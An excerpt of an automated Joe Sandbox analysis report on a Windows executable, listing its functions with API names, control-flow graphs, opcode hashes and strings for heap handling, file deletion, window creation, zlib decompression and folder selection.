                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: ExceptionHandlerVectored$Remove
                                      • String ID:
                                      • API String ID: 3670940754-0
                                      • Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                      • Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
                                      • Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
                                      • Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348
                                      Function 000000014000DA6C Relevance: 3.0, APIs: 2, Instructions: 19fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 660 14000da6c-14000da80 662 14000da82-14000da85 660->662 663 14000da9f 660->663 665 14000da92-14000da9d DeleteFileW 662->665 666 14000da87-14000da8c SetFileAttributesW 662->666 664 14000daa1-14000daa6 663->664 665->664 666->665
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: File$AttributesDelete
                                      • String ID:
                                      • API String ID: 2910425767-0
                                      • Opcode ID: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                      • Instruction ID: adf2a79140fabccb03c20fd21f07aa3af446659453137af282c5310bbe8ffc9f
                                      • Opcode Fuzzy Hash: 55319c824811060fb78973d35cd1766170822acc88010ad74a6f5b99716599dc
                                      • Instruction Fuzzy Hash: 48E05BB471910195FB6BD7A778153F521419F8D7D1F184121AB42071B0EF3D44C55222
                                      Function 0000000140012060 Relevance: 3.0, APIs: 2, Instructions: 11memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 667 140012060-140012090 HeapCreate TlsAlloc call 140012c50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocHeap$CreateValue
                                      • String ID:
                                      • API String ID: 493873155-0
                                      • Opcode ID: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
                                      • Instruction ID: 1c20f48a7e0d63c5f07c3edeff385a7070e23dcbb2ee76a36a736f2f2e91a8b3
                                      • Opcode Fuzzy Hash: 1b0d72df29ce6564ac22208b59af7006679a658f7d576f5e4767aae600ecf03e
                                      • Instruction Fuzzy Hash: F9D0C939A1175092E746AB72A81A3E922A0F75C3C1F901419B70947771DF7E81965A40
                                      Function 0000000140011D30 Relevance: 2.6, APIs: 2, Instructions: 67memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Heap$AllocFreememset
                                      • String ID:
                                      • API String ID: 3063399779-0
                                      • Opcode ID: a0cc480958914a5b96af09c049cabf50404750236a51b526bc810001df406aed
                                      • Instruction ID: a75182db50c1f984f89b78753495ac0ab196a1c9ad642d63c8067afd0bb8a22e
                                      • Opcode Fuzzy Hash: a0cc480958914a5b96af09c049cabf50404750236a51b526bc810001df406aed
                                      • Instruction Fuzzy Hash: 12213B32605B5086EA1ADB53BC4179AA6A8F7C8FD0F498025AF584BB66DE79C852C340
                                      Function 000000014000DD30 Relevance: 2.5, APIs: 2, Instructions: 33memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CloseFreeHandleHeap
                                      • String ID:
                                      • API String ID: 1642312469-0
                                      • Opcode ID: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                      • Instruction ID: 5f93da8337f86b39695cad05c5aa1bbbcf0731d39a623fe836b1511b3ba38e21
                                      • Opcode Fuzzy Hash: 9545ea4844ef45e69c2d13a7e6758b9fd96cb3dc2a279fbef2982152c74e1bd8
                                      • Instruction Fuzzy Hash: AD01FB71614A4081EA56EBA7F5543E96391ABCDBE0F445216BB2E4B7F6DE38C4808740
                                      Function 000000014000DDC0 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                      • Instruction ID: 85eb21683fd68773ec3f68e7974a7ba45b0d300be2a951898864618d3eded784
                                      • Opcode Fuzzy Hash: 286ead757777a38e56b81a59e831c417c9f8bfd861d199e35aced7c4af5c72c7
                                      • Instruction Fuzzy Hash: D4F030B6624694CBCB10DF39E00166977B0F349B48F200416EF4847764DB36C992CF10
                                      Function 000000014000DC88 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                      • Instruction ID: d26b75307fbf4d2f65b3bf59e092d1c76b80437de534da0d48005b48f8adbafa
                                      • Opcode Fuzzy Hash: 93ac6205523c289b50a33b5b006d9a2b969cc6c5ca2cd3404325313acfcde68d
                                      • Instruction Fuzzy Hash: 74C09B74663002C1FA6A936328A97E451905B0C391F504511F7064117089BD14975530
                                      Function 000000014000C980 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CreateHeap
                                      • String ID:
                                      • API String ID: 10892065-0
                                      • Opcode ID: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                      • Instruction ID: 2c080862c33f0b7fb519294060e944d109da0d65108c87cfa11e07f441f421b0
                                      • Opcode Fuzzy Hash: 3010fbf55b21657f3d2da30d78e3fc06337a299998e6cc7e6108e39cc3db3a27
                                      • Instruction Fuzzy Hash: 40C02B34712690C2E3492323AC033991090F34C3C0FD02018F60102770CE3D80A70B00

                                      Non-executed Functions

                                      Function 000000014000B758 Relevance: 72.0, APIs: 35, Strings: 6, Instructions: 272windowmemoryregistryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Window$Message$CreateHeapSend$Freewcslen$Accelerator$LoadMetricsSystemTableTranslate$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundIconLongObjectRegisterStockwcscpy
                                      • String ID: BUTTON$C$EDIT$P$STATIC$n
                                      • API String ID: 9748049-1690119102
                                      • Opcode ID: 3672b20c3f93e9cafd23a15c04167ab05239bdad4ad45a7c7ed3e5f5fd201a6e
                                      • Instruction ID: 503d67efbf07ff6f248b06a67c50be69490569a40db1ce31eb7df8f18fb995d6
                                      • Opcode Fuzzy Hash: 3672b20c3f93e9cafd23a15c04167ab05239bdad4ad45a7c7ed3e5f5fd201a6e
                                      • Instruction Fuzzy Hash: 59D134B5605B4086EB12DB62F8447AA77A5FB8CBC8F404129AF4A47B79DF7DC4498B00
                                      Function 00000001400138E5 Relevance: 12.0, Strings: 9, Instructions: 745COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                      • API String ID: 0-2665694366
                                      • Opcode ID: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
                                      • Instruction ID: 63a129330255db97eb1aabb126bfc5b4551e8f686405ea2d62c327762663274b
                                      • Opcode Fuzzy Hash: 022d8aec80773364c7782894b492e5bf51f6f0f1ab81dba49e519fa5dfe17589
                                      • Instruction Fuzzy Hash: FB620572A106A48BE799CF25D498BED3BF9F748780F518129FB468B7A0E739C845C740
                                      Function 0000000140013175 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 399COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $header crc mismatch$unknown compression method$unknown header flags set
                                      • API String ID: 0-4074041902
                                      • Opcode ID: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
                                      • Instruction ID: 440100e0ad3e42c115cce95f3fb78f0a990aae4413b5501bd8dd5ba0711be261
                                      • Opcode Fuzzy Hash: 678d21ef58d4a875124531cd8bb27c6309f94b37c07dc777e5a796b3eb271508
                                      • Instruction Fuzzy Hash: 7A02B1726007949BEBA78F16C488BAE3BE9FB4CB94F164518EF894B7A0D775C940C740
                                      Function 0000000140016210 Relevance: 4.1, Strings: 3, Instructions: 372COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
                                      • API String ID: 0-3255898291
                                      • Opcode ID: e9ea9672f90cea75fd930f9b725da38f325f2299c3bc13611abce9c87a4e8c41
                                      • Instruction ID: 3f1348f65b8f8bda14ba5cdfa7bf6f02fc8c4dbb68883e69d1ec2b1899c7470d
                                      • Opcode Fuzzy Hash: e9ea9672f90cea75fd930f9b725da38f325f2299c3bc13611abce9c87a4e8c41
                                      • Instruction Fuzzy Hash: C5D138326186D08BD71A8F3AD8447BD7FA1F3993C4F54811AEB968B791D63DCA4AC700
                                      Function 0000000140012FDD Relevance: 4.0, Strings: 3, Instructions: 217COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: incorrect header check$invalid window size$unknown compression method
                                      • API String ID: 0-1186847913
                                      • Opcode ID: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
                                      • Instruction ID: c7f0437dc46e56fef3014f932af091831cb3ca76e565b5a088b3fef6b265a946
                                      • Opcode Fuzzy Hash: e5d9ef9cb6cfd683bb0b87efb43f2fbb65f2835d92bd1581f31df26c1c39ce5d
                                      • Instruction Fuzzy Hash: 9391A2726106949BFBA6CF26C584B9E3BA9F70C794F114229EB464BBE1C736D950CB00
                                      Function 000000014001366E Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $ $invalid block type
                                      • API String ID: 0-2056396358
                                      • Opcode ID: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
                                      • Instruction ID: 6826abb0ae9e935998ffe99ae2e08a78a36fe9b187ecd4f73c4f7ab9da41e151
                                      • Opcode Fuzzy Hash: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
                                      • Instruction Fuzzy Hash: 7161E3B3510B949BE766CF26C8887AD3BE8F708394F554229EB558B7E0D73AC490CB40
                                      Function 000000014000EA48 Relevance: 2.8, APIs: 1, Instructions: 1540COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: memmove
                                      • String ID:
                                      • API String ID: 2162964266-0
                                      • Opcode ID: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
                                      • Instruction ID: c8f745e53e58f4d3ff63e30af0f782c513ee99f48fb140b821e661274e727f8d
                                      • Opcode Fuzzy Hash: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
                                      • Instruction Fuzzy Hash: 1DC291B3A282408BD368CF69E85665BB7A1F7D8748F45A029FB87D3B44D63CD9018F44
                                      Function 0000000140010210 Relevance: .7, Instructions: 676COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
                                      • Instruction ID: 022ba38ea2fc746ee1b0595bfd7f682d53a7df84c20089d95d53e5e85305b389
                                      • Opcode Fuzzy Hash: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
                                      • Instruction Fuzzy Hash: E32283B7F744204BD71DCB69EC52FE836A2B75434C709A02CAA17D3F44EA3DEA158A44
                                      Function 0000000140015170 Relevance: .2, Instructions: 215COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
                                      • Instruction ID: f294bca1e54ba5f97cd1887ffa6c8c7d976b4678fb34f7ffe8470b0002a4fcc7
                                      • Opcode Fuzzy Hash: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
                                      • Instruction Fuzzy Hash: 7B8150733301749BE7668A2EA514BE93290F3693CEFC56115FB8487B45CA3EB921CB50
                                      Function 0000000140015160 Relevance: .2, Instructions: 198COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
                                      • Instruction ID: e67d2bfc1a2697f1f60af7736c02a9787f64ff3490f4c327f028a03746ec3e44
                                      • Opcode Fuzzy Hash: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
                                      • Instruction Fuzzy Hash: FE715CB23301749BEB658B2E9514BE93390F36A349FC56105EB855BB81CE3EB921CF50
                                      Function 00000001400154F0 Relevance: .1, Instructions: 120COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
                                      • Instruction ID: b94fce4af05d2a3b47cf10f4c42de706c870d6d3f1c440dba90fb4ad6b70bb1c
                                      • Opcode Fuzzy Hash: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
                                      • Instruction Fuzzy Hash: 3941BB32310640CAFBAA9B1AE020BEE3691E7997C5FD49115DB819FAF0D63BD4058B40
                                      Function 000000014000BC94 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 115libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
                                      • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                      • API String ID: 217932011-4219398408
                                      • Opcode ID: c6f64f31bbdd53e5c9615b97b996e53b9347b52efb9bfdd58b217e32d9a890a1
                                      • Instruction ID: f53257261a77fa7679be829afa5858120bcd1a05ac071047bacb850080d37645
                                      • Opcode Fuzzy Hash: c6f64f31bbdd53e5c9615b97b996e53b9347b52efb9bfdd58b217e32d9a890a1
                                      • Instruction Fuzzy Hash: F7418D72211B8082EB16EF12E8443EA73A4F78CBC8F544125EB4A477A5EF39C95AC700
                                      Function 000000014000DB18 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 107libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                      • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                      • API String ID: 1740785346-287042676
                                      • Opcode ID: e5bab1e40f8d65dd4e7d5d62996c70c4389265927e72bd1646414111646def34
                                      • Instruction ID: ffb59ae5301eeda9161766390bd85b6f914ac2b2dd013f36d3426db2d5643a12
                                      • Opcode Fuzzy Hash: e5bab1e40f8d65dd4e7d5d62996c70c4389265927e72bd1646414111646def34
